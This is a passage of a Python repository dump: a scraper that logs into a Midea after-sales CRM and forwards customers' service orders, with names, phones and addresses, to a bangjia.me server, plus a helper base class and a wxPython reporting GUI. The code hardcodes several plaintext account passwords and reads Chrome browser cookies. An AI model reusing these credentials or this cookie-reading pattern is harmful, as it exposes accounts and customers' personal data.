"text": "import json\nimport time\nfrom datetime import date, timedelta\n\nimport requests\n\nfrom BaseUtil import BaseUtil\n\n\nclass MideaUtil(BaseUtil):\n\n def __init__(self, username, passwd, adminid='24', factoryid='4', baseurl='https://cs.midea.com/c-css/',\n bjdomain='http://yxgtest.bangjia.me'):\n super(MideaUtil, self).__init__(username, passwd, adminid, factoryid, baseurl, bjdomain)\n self.headers['Accept'] = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\" \\\n \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n self.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'\n self.dataverify = {'code': 2, 'msg': '输入验证码', 'element': ''}\n\n def login(self, param=None):\n self.headers['Accept'] = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\" \\\n \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n self.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'\n if not param:\n loginurl = self.baseurl + \"login\"\n self.headers['Referer'] = loginurl\n response = self.session.get(loginurl, headers=self.headers)\n response.encoding = 'utf-8'\n print(\"login statuscode={}\".format(response.status_code == 200))\n print(\"login response={}\".format(response.text))\n if response.status_code == 200:\n result = self.loginauth()\n else:\n return self.getCaptcha()\n else:\n result = self.loginauth(param)\n print(\"login result={}\".format(result))\n print(\"param={}\".format(param))\n return param\n\n def getCaptcha(self):\n self.dataverify['url'] = self.baseurl + \"captcha?r={}\".format(round(time.time()*1000))\n return self.dataverify\n\n def loginauth(self, param=None):\n code = param['code'] if param and 'code' in param else param\n if not code:\n if not self.checkState():\n return self.getCaptcha()\n else:\n code = ''\n authurl = self.baseurl + \"signin\"\n data = {\"userAccount\": self.username,\n \"userPassword\": \"6d904a32d4dbf2db15336eadca0d4802edfe2f85c0da02a32bff93b70c8d0b2c7181fd58c434c7838dd2b234feda762fbca546967a5ea7568958f55bc7966dd1\",\n \"captcha\": code, \"domainType\": \"CS\"}\n print(\"loginauth data={}\".format(data))\n response = self.session.post(authurl, headers=self.headers, data=data)\n self.headers['Referer'] = authurl\n response.encoding = 'utf-8'\n print(\"loginauth result={}\".format(response.text))\n if response.status_code == 200:\n result = json.loads(response.text)\n if result and 'status' in result and result['status']:\n return self.loadOrders(True)\n return self.datafail\n\n def checkState(self):\n checkurl = self.baseurl + \"captchaState\"\n data = {\"userAccount\": self.username}\n response = self.session.post(checkurl, headers=self.headers, data=data)\n response.encoding = 'utf-8'\n result = False\n print(\"checkstate response={}\".format(response.text))\n if response.status_code == 200:\n state = json.loads(response.text)\n if state and 'content' in state and not state['content']:\n result = True\n else:\n result = False\n print(\"checkstate result={}\".format(result))\n return result\n\n def isLogin(self):\n self.headers['Accept'] = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\" \\\n \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n self.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'\n mainurl = self.baseurl + \"views/css/desktop/index.jsp\"\n print(mainurl)\n response = self.session.get(mainurl, headers=self.headers)\n response.encoding = 'utf-8'\n print(\"loadOrders response={}\".format(response.text))\n if response.status_code == 200 and not response.text.startswith(\"<script>\"):\n return True\n return False\n\n def loadOrders(self, param=None):\n if not param and not self.isLogin():\n return self.login()\n try:\n data = {\"data\": json.dumps(list(self.loadPageOrder()))}\n requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data=data)\n except:\n return self.datafail\n return self.datasuccess\n\n def loadPageOrder(self, page=1, totalcount=100, pageSize=100):\n # 开始加载工单\n self.headers['Accept'] = \"*/*\"\n self.headers['Content-Type'] = 'application/json'\n dataurl = self.baseurl + \"womflow/serviceorderunit/listdata\"\n data = {\"page\": page, \"rows\": pageSize, \"pageIndex\": page - 1, \"pageSize\": pageSize,\n \"formConditions\": {\"SERVICE_ORDER_STATUS\": \"\",\n \"CONTACT_TIME\": (date.today() - timedelta(days=7)).strftime(\"%Y-%m-%d\"),\n \"CONTACT_TIME_end\": (date.today()).strftime(\"%Y-%m-%d\")}}\n response = self.session.post(dataurl, headers=self.headers, data=json.dumps(data))\n self.headers['Referer'] = self.baseurl + \"womflow/serviceorderunit/list?type=womServiceNotFinshCount\"\n response.encoding = 'utf-8'\n print(\"loadOrders response={}\".format(response.text))\n result = json.loads(response.text)\n if result and 'status' in result and result['status']:\n data = result['content']\n totalcount = data['total']\n pagecount = data['pageCount']\n pageSize = data['pageSize']\n page = data['pageIndex']\n print(\"totalcount={} pagecount={} pageSize={} page={}\".format(totalcount, pagecount, pageSize, page))\n if page >= pagecount:\n yield from self.parseOrders(data)\n else:\n yield from self.parseOrders(data)\n yield from self.loadPageOrder(page + 1, totalcount, pageSize)\n\n def parseOrders(self, data):\n for item in data['rows']:\n yield {\n 'factorynumber': item['SERVICE_ORDER_NO'], 'ordername': item['SERVICE_SUB_TYPE_NAME'],\n 'username': item['SERVICE_CUSTOMER_NAME'], 'mobile': item['SERVICE_CUSTOMER_TEL1'],\n 'orderstatus': item['SERVICE_ORDER_STATUS'], 'originname': item['ORDER_ORIGIN'],\n 'machinetype': item['PROD_NAME'], 'machinebrand': item['BRAND_NAME'],\n 'sn': '', 'version': item['PRODUCT_MODEL'] if 'PRODUCT_MODEL' in item else '',\n 'repairtime': item['FINAL_APPOINT_TIME'] if 'FINAL_APPOINT_TIME' in item else '',\n 'mastername': item['ENGINEER_NAME'] if 'ENGINEER_NAME' in item else '',\n 'note': item['PUB_REMARK'] if 'PUB_REMARK' in item else '',\n 'companyid': self.factoryid, 'adminid': self.adminid,\n 'address': str(item['SERVICE_CUSTOMER_ADDRESS']),\n # 'province': item['provinceName'], 'city': item['cityName'],\n # 'county': item['regionName'], 'town': item['countyName'],\n 'ordertime': item['CONTACT_TIME'],\n 'description': item['SERVICE_DESC'],\n }\n\n\nif __name__ == '__main__':\n # util = ConkaUtil('K608475', 'Kuser6646!', adminid='20699', factoryid='1')\n util = MideaUtil('AW3306009461', 'Md123456789!', adminid='24', factoryid='4')\n # util = MideaUtil('Aw3302060387', 'Jj62721262', adminid='24', factoryid='4')\n # util = ConkaUtil('K608069', 'Crm@20200401', adminid='24', factoryid='1')\n print(util.loadOrders())\n"
},
{
"alpha_fraction": 0.577509880065918,
"alphanum_fraction": 0.5908834338188171,
"avg_line_length": 34.393333435058594,
"blob_id": "674362ed633ab8885ffa7883e16d91a67d62c0a8",
"content_id": "c900c69052c179b674698be3e1a3b6a132312d96",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5367,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 150,
"path": "/BaseUtil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import re\nfrom urllib.parse import urlparse\nimport json\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import date, timedelta, datetime\n\nfrom Util import Util\nfrom cookie_test import fetch_chrome_cookie\n\n\nclass BaseUtil(Util):\n def __init__(self, username, passwd, adminid='15870', factoryid='1', baseurl='https://crm.konka.com',\n bjdomain='http://north.bangjia.me'):\n parsed_uri = urlparse(baseurl)\n self.host = parsed_uri.netloc\n self.username = username\n self.passwd = passwd\n self.baseurl = baseurl\n self.adminid = adminid\n self.factoryid = factoryid\n self.bjdomain = bjdomain\n self.mainurl = self.baseurl + '/admin/page!main.action'\n self.searchurl = self.baseurl + '/afterservice/afterservice!api.action'\n self.session = requests.Session()\n self.agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'\n self.datasuccess = {'code': 1, 'msg': '抓单成功', 'element': ''}\n self.datafail = {'code': 0, 'msg': '抓单失败,请确认账号密码是否正确'}\n self.dataverify = {'code': 2, 'msg': '登录过期,请重新登录', 'element': ''}\n self.headers = {'Content-Type': 'application/json;charset=UTF-8',\n 'User-Agent': self.agent, 'Referer': self.baseurl,\n 'Upgrade-Insecure-Requests': '1', 'Host': self.host, 'Origin': self.baseurl,\n 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive',\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n 'Accept': 'application/json, text/plain, */*'}\n self.initCookie()\n\n def getsoup(self, response):\n response.encoding = 'utf-8'\n return BeautifulSoup(response.text, features=\"lxml\")\n\n def parseHtml(self, htmlstr):\n bsObj = BeautifulSoup(htmlstr, features=\"lxml\")\n if not bsObj:\n return \"\"\n return bsObj.text.strip()\n\n def getjson(self, response):\n response.encoding = 'utf-8'\n try:\n result = json.loads(response.text)\n except Exception as e:\n print(\"getjson failed:{}\".format(str(e)))\n result = None\n return result\n\n @staticmethod\n def merge(lst1, lst2, keys, isCover=False):\n def generate_key(item):\n if type(keys) == list:\n return \"_\".join(str(v) for k, v in item.items() if k in keys)\n else:\n return \"_\".join(str(v) for k, v in item.items() if k == keys)\n\n hash_map = {}\n for item in lst1 + lst2:\n if isCover:\n hash_map[generate_key(item)] = item\n else:\n hash_map.setdefault(generate_key(item), item)\n result = list(hash_map.values())\n return result if result else []\n\n def initCookie(self, cookies=None):\n pass\n\n def login(self, param=None):\n pass\n\n def loadOrders(self, param=None):\n pass\n\n @staticmethod\n def getCookie(domains=[], isExact=False):\n return fetch_chrome_cookie(domains, isExact=isExact)\n\n @staticmethod\n def getCookies(cookie):\n cookies = dict([l.split(\"=\", 1) for l in cookie.split(\"; \")])\n return cookies\n\n @staticmethod\n def getDateBefore(day):\n return (date.today() - timedelta(days=day)).strftime(\"%Y-%m-%d\")\n\n @staticmethod\n def clearKey(data, datakey, destkey='address'):\n if datakey in data and data[destkey] and data[destkey].strip().startswith(data[datakey].strip()):\n data[destkey] = data[destkey].replace(data[datakey], '', 1).strip()\n return data\n\n @staticmethod\n def clearAddress(orderinfo, destkey='address'):\n if destkey not in orderinfo:\n return orderinfo\n orderinfo = BaseUtil.clearKey(orderinfo, \"province\", destkey)\n orderinfo = BaseUtil.clearKey(orderinfo, \"city\", destkey)\n orderinfo = BaseUtil.clearKey(orderinfo, \"county\", destkey)\n orderinfo = BaseUtil.clearKey(orderinfo, \"town\", destkey)\n return orderinfo\n\n @staticmethod\n def getTimeStr(string, isDefault=True):\n defaultValue = '00:00:00' if isDefault else ''\n try:\n time_str = re.compile(r\"\\d{2}:\\d{1,2}\").findall(string)[0]\n result = time_str if BaseUtil.isTime(time_str) else defaultValue\n return result\n except IndexError:\n return defaultValue\n\n @staticmethod\n def isTime(time_str):\n return BaseUtil.isTimesecondstr(time_str) or BaseUtil.isTimestr(time_str)\n\n @staticmethod\n def isTimesecondstr(time_str):\n try:\n datetime.strptime(time_str, '%H:%M:%S')\n return True\n except ValueError:\n return False\n\n @staticmethod\n def isTimestr(time_str):\n try:\n datetime.strptime(time_str, '%H:%M')\n return True\n except ValueError:\n return False\n\n @staticmethod\n def isDatetimestr(datetime_str):\n try:\n datetime.strptime(datetime_str, '%Y-%m-%d %H:%M:%S')\n return True\n except ValueError:\n return False\n\n# print(\"getDateBefore(0)={}\".format(BaseUtil.getDateBefore(0)))\n"
},
{
"alpha_fraction": 0.5673391222953796,
"alphanum_fraction": 0.5796675086021423,
"avg_line_length": 36.90088653564453,
"blob_id": "885ced8da7dab3f44b902465ac8b1296a18832eb",
"content_id": "5bc59f04c2f28029ce56c9b4abbe7d8f1f2988a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21822,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 565,
"path": "/master.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nimport wx\nimport wx.adv\nimport wx.lib.mixins.inspection\nimport wx.lib.mixins.listctrl as listmix\nimport searchutil\n\nAppTitle = \"报表管理\"\nVERSION = 0.1\n\n\nclass MyListCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin):\n def __init__(self, parent, id, pos=wx.DefaultPosition,\n size=wx.DefaultSize, style=0):\n super(MyListCtrl, self).__init__(parent, id, pos, size, style)\n\n # ------------\n\n listmix.ListCtrlAutoWidthMixin.__init__(self)\n\n # ------------\n\n # Simplified init method.\n self.CreateColumns()\n self.SetProperties()\n\n # ---------------------------------------------------------------------------\n\n def CreateColumns(self):\n \"\"\"\n Create columns for listCtrl.\n \"\"\"\n self.InsertColumn(col=0, heading=\"ID\", format=wx.LIST_FORMAT_LEFT)\n self.InsertColumn(col=1, heading=\"操作人\", format=wx.LIST_FORMAT_LEFT)\n self.InsertColumn(col=2, heading=\"建单量\", format=wx.LIST_FORMAT_LEFT)\n self.InsertColumn(col=3, heading=\"派单量\", format=wx.LIST_FORMAT_LEFT)\n self.InsertColumn(col=4, heading=\"完工审核量\", format=wx.LIST_FORMAT_LEFT)\n self.InsertColumn(col=5, heading=\"工资结算量\", format=wx.LIST_FORMAT_LEFT)\n self.InsertColumn(col=6, heading=\"回访量\", format=wx.LIST_FORMAT_LEFT)\n\n # ------------\n\n # ASTUCE (Tip) - ListCtrlAutoWidthMixin :\n # pour diminuer le scintillement des colonnes\n # lors du redimensionnement de la mainframe,\n # regler la derniere colonne sur une largeur elevee.\n # Vous devez toujours visualiser l'ascenseur horizontal.\n\n # Set the width of the columns (x4).\n # Integer, wx.LIST_AUTOSIZE or wx.LIST_AUTOSIZE_USEHEADER.\n self.SetColumnWidth(col=0, width=50)\n self.SetColumnWidth(col=1, width=100)\n self.SetColumnWidth(col=2, width=60)\n self.SetColumnWidth(col=3, width=60)\n self.SetColumnWidth(col=4, width=110)\n self.SetColumnWidth(col=5, width=110)\n self.SetColumnWidth(col=6, width=60)\n\n def SetProperties(self):\n \"\"\"\n Set the list control properties (icon, font, size...).\n \"\"\"\n\n # Font size and style for listCtrl.\n fontSize = self.GetFont().GetPointSize()\n\n # Text attributes for columns title.\n # wx.Font(pointSize, family, style, weight, underline, faceName)\n if wx.Platform in [\"__WXMAC__\", \"__WXGTK__\"]:\n boldFont = wx.Font(fontSize - 1,\n wx.DEFAULT,\n wx.NORMAL,\n wx.NORMAL,\n False, \"\")\n self.SetForegroundColour(\"black\")\n self.SetBackgroundColour(\"#ece9d8\") # ecf3fd\n\n else:\n boldFont = wx.Font(fontSize,\n wx.DEFAULT,\n wx.NORMAL,\n wx.BOLD,\n False, \"\")\n self.SetForegroundColour(\"#808080\")\n self.SetBackgroundColour(\"#ece9d8\") # ecf3fd\n\n self.SetFont(boldFont)\n\n\nclass MyFrame(wx.Frame):\n def __init__(self, parent, id, title,\n style=wx.DEFAULT_FRAME_STYLE | wx.NO_FULL_REPAINT_ON_RESIZE | wx.CLIP_CHILDREN):\n super(MyFrame, self).__init__(parent=None, id=-1, title=title, style=style)\n\n # Returns application name.\n self.app_name = wx.GetApp().GetAppName()\n # Returns bitmaps folder.\n self.bitmaps_dir = wx.GetApp().GetBitmapsDir()\n # Returns icons folder.\n self.icons_dir = wx.GetApp().GetIconsDir()\n\n # Simplified init method.\n self.getAdminids() # 获取所有的网点\n self.getMasters(0) # 获取网点下的所有师傅\n self.SetProperties() # 设置界面的属性\n self.MakeMenuBar()\n self.MakeStatusBar()\n self.CreateCtrls()\n self.BindEvents()\n self.DoLayout()\n\n self.OnTimer(None)\n\n self.timer = wx.Timer(self)\n self.timer.Start(3000)\n self.Bind(wx.EVT_TIMER, self.OnTimer)\n\n def getAdminids(self):\n pass\n\n def getMasters(self, adminid):\n pass\n\n def SetProperties(self):\n \"\"\"\n Set the frame properties (title, icon, size...).\n \"\"\"\n # Setting some frame properties.\n frameIcon = wx.Icon(os.path.join(self.icons_dir, \"icon_wxWidgets.ico\"), type=wx.BITMAP_TYPE_ICO)\n self.SetIcon(frameIcon)\n # Frame cursor.\n cursorHand = wx.Cursor(os.path.join(self.icons_dir, \"hand.cur\"), type=wx.BITMAP_TYPE_CUR)\n self.SetCursor(cursorHand)\n self.SetTitle(\"%s V%.1f\" % (self.app_name, VERSION))\n\n def MakeMenuBar(self):\n # Set an icon to the exit/about menu item.\n emptyImg = wx.Bitmap(os.path.join(self.bitmaps_dir, \"item_empty.png\"), type=wx.BITMAP_TYPE_PNG)\n exitImg = wx.Bitmap(os.path.join(self.bitmaps_dir, \"item_exit.png\"), type=wx.BITMAP_TYPE_PNG)\n helpImg = wx.Bitmap(os.path.join(self.bitmaps_dir, \"item_about.png\"), type=wx.BITMAP_TYPE_PNG)\n\n # menu.\n mnuFile = wx.Menu()\n mnuInfo = wx.Menu()\n\n # mnuFile.\n # Show how to put an icon in the menu item.\n menuItem1 = wx.MenuItem(mnuFile, -1, \"布局查看\\tCtrl+Alt+I\", \"布局查看工具 !\")\n menuItem1.SetBitmap(emptyImg)\n mnuFile.Append(menuItem1)\n self.Bind(wx.EVT_MENU, self.OnOpenWidgetInspector, menuItem1)\n\n # Show how to put an icon in the menu item.\n menuItem2 = wx.MenuItem(mnuFile, wx.ID_EXIT, \"退出\\tCtrl+Q\", \"关闭 !\")\n menuItem2.SetBitmap(exitImg)\n mnuFile.Append(menuItem2)\n self.Bind(wx.EVT_MENU, self.OnExit, menuItem2)\n\n # mnuInfo.\n # Show how to put an icon in the menu item.\n menuItem2 = wx.MenuItem(mnuInfo, wx.ID_ABOUT, \"关于\\tCtrl+A\", \"关于软件 !\")\n menuItem2.SetBitmap(helpImg)\n mnuInfo.Append(menuItem2)\n self.Bind(wx.EVT_MENU, self.OnAbout, menuItem2)\n\n # menuBar.\n menubar = wx.MenuBar()\n\n # Add menu voices.\n menubar.Append(mnuFile, \"文件\")\n menubar.Append(mnuInfo, \"关于\")\n\n self.SetMenuBar(menubar)\n\n def MakeStatusBar(self):\n \"\"\"\n Create the status bar for my frame.\n \"\"\"\n\n # Statusbar.\n self.myStatusBar = self.CreateStatusBar(1)\n self.myStatusBar.SetFieldsCount(2)\n self.myStatusBar.SetStatusWidths([-8, -4])\n self.myStatusBar.SetStatusText(\"\", 0)\n self.myStatusBar.SetStatusText(\"bangjia.me.\", 1)\n\n def getTodayDate(self, _date, _type):\n now = _date\n print(type(now))\n zero_date = now - timedelta(hours=now.hour, minutes=now.minute, seconds=now.second,\n microseconds=now.microsecond)\n if _type == 0:\n return zero_date\n else:\n return zero_date + timedelta(hours=23, minutes=59, seconds=59)\n\n def CreateCtrls(self):\n \"\"\"\n Create some controls for my frame.\n \"\"\"\n\n # Font style for wx.StaticText.\n font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)\n font.SetWeight(wx.BOLD)\n\n self.adminid = None\n self.masters = None\n self.userids = []\n self.startdate = self.getTodayDate(datetime.now(), 0)\n self.enddate = self.getTodayDate(datetime.now(), 1)\n # Widgets.\n self.panel = wx.Panel(self)\n\n # self.stEmployees = wx.StaticText(self.panel, -1, \"Employees list :\")\n # self.stEmployees.SetForegroundColour(\"gray\")\n # self.stEmployees.SetFont(font)\n\n # Image list.\n self.il = wx.ImageList(16, 16, True)\n\n # Set an icon for the first column.\n self.bmp = wx.Bitmap(os.path.join(self.bitmaps_dir, \"employee.png\"), type=wx.BITMAP_TYPE_PNG)\n\n # Add image to list.\n self.img_idx = self.il.Add(self.bmp)\n\n self.listCtrl = MyListCtrl(self.panel, -1,\n style=wx.LC_REPORT | wx.LC_SINGLE_SEL | wx.LC_VRULES | wx.BORDER_SUNKEN)\n\n # Assign the image list to it.\n self.listCtrl.SetImageList(self.il, wx.IMAGE_LIST_SMALL)\n\n # Retrieve data from the database.\n # self.employeeData = self.OnLoadData()\n #\n # # Populate the wx.ListCtrl.\n # for i in self.employeeData:\n # index = self.listCtrl.InsertItem(self.listCtrl.GetItemCount(),\n # ((str(i[0]))))\n # self.listCtrl.SetItem(index, 1, i[1])\n # self.listCtrl.SetItem(index, 2, i[2])\n # self.listCtrl.SetItem(index, 3, i[3])\n # self.listCtrl.SetItem(index, 4, i[4])\n # self.listCtrl.SetItemImage(self.listCtrl.GetItemCount() - 1,\n # self.img_idx)\n #\n # # Alternate the row colors of a ListCtrl.\n # # Mike Driscoll... thank you !\n # if index % 2:\n # self.listCtrl.SetItemBackgroundColour(index, \"#ffffff\")\n # else:\n # self.listCtrl.SetItemBackgroundColour(index, \"#ece9d8\") # ecf3fd\n\n self.stSearch = wx.StaticText(self.panel, -1, 'Search \"Surname\" :')\n self.txSearch = wx.TextCtrl(self.panel, -1, \"\", size=(100, -1))\n self.txSearch.SetToolTip(\"Search employee !\")\n\n self.StaticSizer = wx.StaticBox(self.panel, -1, \"Commands :\")\n self.StaticSizer.SetForegroundColour(\"red\")\n self.StaticSizer.SetFont(font)\n\n self.bntSearch = wx.Button(self.panel, -1, \"搜索\")\n self.bntSearch.SetToolTip(\"搜索角色的操作单量 !\")\n\n self.bntClear = wx.Button(self.panel, -1, \"&Clear\")\n self.bntClear.SetToolTip(\"Clear the search text !\")\n\n self.bntShowAll = wx.Button(self.panel, -1, \"&All\")\n self.bntShowAll.SetToolTip(\"Show all !\")\n\n self.bntNew = wx.Button(self.panel, -1, \"&Insert\")\n self.bntNew.SetToolTip(\"Insert a new employee !\")\n\n self.bntEdit = wx.Button(self.panel, -1, \"&Update\")\n self.bntEdit.SetToolTip(\"Update selected employee !\")\n\n self.bntDelete = wx.Button(self.panel, -1, \"&Delete\")\n self.bntDelete.SetToolTip(\"Delete selected employee !\")\n\n self.bntClose = wx.Button(self.panel, -1, \"&Quit\")\n self.bntClose.SetToolTip(\"Close !\")\n\n # 创建操作区元素\n self.wangdian_text = wx.StaticText(self.panel, -1, \"选择网点:\")\n self.master_text = wx.StaticText(self.panel, -1, \"选择操作人:\")\n self.time_text = wx.StaticText(self.panel, -1, \"操作时间:\")\n self.to_text = wx.StaticText(self.panel, -1, \"到\")\n # ch1 = wx.ComboBox(self.panel, -1, value='C', choices=searchutil.getAdminids(), style=wx.CB_SORT)\n self.ch_adminid = wx.Choice(self.panel, -1, choices=searchutil.getAdminids())\n self.ch_master = wx.Choice(self.panel, -1, choices=['全部'])\n self.start = wx.adv.DatePickerCtrl(self.panel, -1, size=(120, 22),\n style=wx.adv.DP_DROPDOWN | wx.adv.DP_SHOWCENTURY)\n self.end = wx.adv.DatePickerCtrl(self.panel, -1, size=(120, 22),\n style=wx.adv.DP_DROPDOWN | wx.adv.DP_SHOWCENTURY)\n self.ch_adminid.SetSelection(0)\n self.adminid = 24\n self.getAllMasters()\n\n def BindEvents(self):\n \"\"\"\n 添加事件处理\n \"\"\"\n\n # self.txSearch.Bind(wx.EVT_TEXT, self.OnUpperCaseText)\n #\n # # Intercept the click on the wx.ListCtrl.\n # self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnItemSelected, self.listCtrl)\n # self.Bind(wx.EVT_LIST_COL_BEGIN_DRAG, self.OnColBeginDrag, self.listCtrl)\n # self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.OnItemActivated, self.listCtrl)\n #\n self.Bind(wx.EVT_BUTTON, self.OnSearch, self.bntSearch)\n # self.Bind(wx.EVT_BUTTON, self.OnClear, self.bntClear)\n # self.Bind(wx.EVT_BUTTON, self.OnShowAll, self.bntShowAll)\n # self.Bind(wx.EVT_BUTTON, self.OnNew, self.bntNew)\n # self.Bind(wx.EVT_BUTTON, self.OnEdit, self.bntEdit)\n # self.Bind(wx.EVT_BUTTON, self.OnDelete, self.bntDelete)\n self.Bind(wx.EVT_BUTTON, self.OnExit, self.bntClose)\n\n self.Bind(wx.EVT_CLOSE, self.OnExit)\n self.Bind(wx.EVT_CHOICE, self.on_choice_a, self.ch_adminid)\n self.Bind(wx.EVT_CHOICE, self.on_choice_m, self.ch_master)\n self.Bind(wx.adv.EVT_DATE_CHANGED, self.OnDateChanged, self.start)\n self.Bind(wx.adv.EVT_DATE_CHANGED, self.OnDateChanged2, self.end)\n\n def DoLayout(self):\n # Sizer.\n actionSizer = wx.BoxSizer(wx.HORIZONTAL)\n textSizer = wx.BoxSizer(wx.VERTICAL)\n mainSizer = wx.BoxSizer(wx.HORIZONTAL)\n btnSizer = wx.StaticBoxSizer(self.StaticSizer, wx.VERTICAL)\n\n # Assign widgets to sizers.\n # actionSizer\n # actionSizer.Add(self.stEmployees, 0, wx.BOTTOM, 5)\n actionSizer.Add(self.wangdian_text, 0, flag=wx.LEFT | wx.RIGHT | wx.FIXED_MINSIZE, border=5)\n actionSizer.Add(self.ch_adminid, 0, flag=wx.LEFT | wx.RIGHT | wx.FIXED_MINSIZE, border=5)\n actionSizer.Add(self.master_text, 0, flag=wx.LEFT | wx.RIGHT | wx.FIXED_MINSIZE, border=5)\n actionSizer.Add(self.ch_master, 0, flag=wx.LEFT | wx.RIGHT | wx.FIXED_MINSIZE, border=5)\n actionSizer.Add(self.time_text, 0, flag=wx.LEFT | wx.RIGHT | wx.FIXED_MINSIZE, border=5)\n actionSizer.Add(self.start, 0, flag=wx.LEFT | wx.RIGHT | wx.FIXED_MINSIZE)\n actionSizer.Add(self.to_text, 0, flag=wx.LEFT | wx.RIGHT | wx.FIXED_MINSIZE, border=5)\n actionSizer.Add(self.end, 0, flag=wx.LEFT | wx.RIGHT | wx.FIXED_MINSIZE)\n actionSizer.Add(self.bntSearch, 0, wx.ALL, border=5)\n # textSizer.\n textSizer.Add(actionSizer, 0, wx.BOTTOM, 10)\n textSizer.Add(self.listCtrl, 1, wx.EXPAND)\n\n # btnSizer.\n btnSizer.Add(self.stSearch)\n btnSizer.Add(self.txSearch)\n # btnSizer.Add((5, 5), -1)\n # btnSizer.Add(self.bntSearch, 0, wx.ALL, 5)\n btnSizer.Add((5, 5), -1)\n btnSizer.Add(self.bntClear, 0, wx.ALL, 5)\n btnSizer.Add((5, 5), -1)\n btnSizer.Add(self.bntShowAll, 0, wx.ALL, 5)\n btnSizer.Add((5, 5), -1)\n btnSizer.Add(self.bntNew, 0, wx.ALL, 5)\n btnSizer.Add((5, 5), -1)\n btnSizer.Add(self.bntEdit, 0, wx.ALL, 5)\n btnSizer.Add((5, 5), -1)\n btnSizer.Add(self.bntDelete, 0, wx.ALL, 5)\n btnSizer.Add((5, 5), -1)\n btnSizer.Add(self.bntClose, 0, wx.ALL, 5)\n\n # Assign to mainSizer the other sizers.\n mainSizer.Add(textSizer, 1, wx.ALL | wx.EXPAND, 10)\n mainSizer.Add(btnSizer, 0, wx.ALL, 10)\n mainSizer.Hide(btnSizer)\n\n # Assign to panel the mainSizer.\n self.panel.SetSizer(mainSizer)\n mainSizer.Fit(self)\n # mainSizer.SetSizeHints(self)\n\n def OnOpenWidgetInspector(self, event):\n \"\"\"\n Activate the widget inspection tool,\n giving it a widget to preselect in the tree.\n Use either the one under the cursor,\n if any, or this frame.\n \"\"\"\n\n from wx.lib.inspection import InspectionTool\n wnd = wx.FindWindowAtPointer()\n if not wnd:\n wnd = self\n InspectionTool().Show(wnd, True)\n\n def on_combobox(self, event):\n print(\"选择{0}\".format(event.GetString()))\n\n def on_choice_a(self, event):\n self.adminid = event.GetString()\n print(\"选择网点id:{}\".format(self.adminid))\n self.ch_master.Clear()\n self.getAllMasters()\n\n def getAllMasters(self):\n self.masters = searchutil.getMasters(self.adminid)\n # masterStr = []\n # self.ch_master.Client(0, None)\n for index, master in enumerate(self.masters):\n if index != 0:\n self.userids.append(str(master['userid']))\n # masterStr.append(str(master['username']))\n self.ch_master.Append(master['username'], master)\n # self.ch_master.SetItems(masterStr) # 可行\n self.ch_master.SetSelection(0)\n\n def on_choice_m(self, event):\n print(\"选择操作人:{}\".format(event.GetString()))\n print(\"选择到操作人的其他参数:{}\".format(event.GetClientData()))\n\n def OnDateChanged(self, evt):\n print(\"OnDateChanged: %s\\n\" % evt.GetDate())\n # self.log.write(\"OnDateChanged: %s\\n\" % evt.GetDate())\n self.startdate = self.getTodayDate(wx.wxdate2pydate(evt.GetDate()), 0)\n print(\"OnDateChanged2 startdate: %s\\n\" % self.startdate)\n pass\n\n def OnDateChanged2(self, evt):\n print(\"OnDateChanged2: %s\\n\" % evt.GetDate())\n # self.log.write(\"OnDateChanged2: %s\\n\" % evt.GetDate())\n self.enddate = self.getTodayDate(wx.wxdate2pydate(evt.GetDate()), 1)\n print(\"OnDateChanged2 enddate: %s\\n\" % self.enddate)\n pass\n\n def OnSearch(self, event):\n print(\"OnSearch\")\n # print(self.ch_adminid.GetSelection()) # 选中的索引\n # itemObject = self.ch_adminid.GetClientData(self.ch_adminid.GetSelection())\n if self.ch_master.GetSelection() == 0:\n # userid = self.ch_master.GetItems() # 获取到了所有的展示名称列表\n userid = self.userids\n else:\n userid = self.ch_master.GetClientData(self.ch_master.GetSelection())\n print(\"adminid={}, userid={}\".format(self.adminid, userid))\n print(\"startdate={}, enddate={}\".format(self.startdate, self.enddate))\n self.updateList(searchutil.getOperators(self.adminid, userid,\n self.startdate.strftime('%Y-%m-%d %H:%M:%S'),\n self.enddate.strftime('%Y-%m-%d %H:%M:%S')))\n pass\n\n def updateList(self, datas):\n self.listCtrl.SetFocus()\n self.listCtrl.DeleteAllItems()\n print(datas)\n # Populate the wx.ListCtrl.\n for _index, _data in enumerate(datas):\n index = self.listCtrl.InsertItem(self.listCtrl.GetItemCount(),str(_index + 1))\n if not _data['datas']:\n print()\n for items in _data['datas']:\n print(items)\n\n data = {}\n username = ''\n # 操作类别:1:建单 2:派单 3:审核 4:结算 5:回访\n for item in items:\n username = item['username']\n data[str(item['opertype'])] = item['total_count']\n\n self.listCtrl.SetItem(index, 1, username)\n self.listCtrl.SetItem(index, 2, 0 if '1' not in data else data['1'])\n self.listCtrl.SetItem(index, 3, 0 if '2' not in data else data['2'])\n 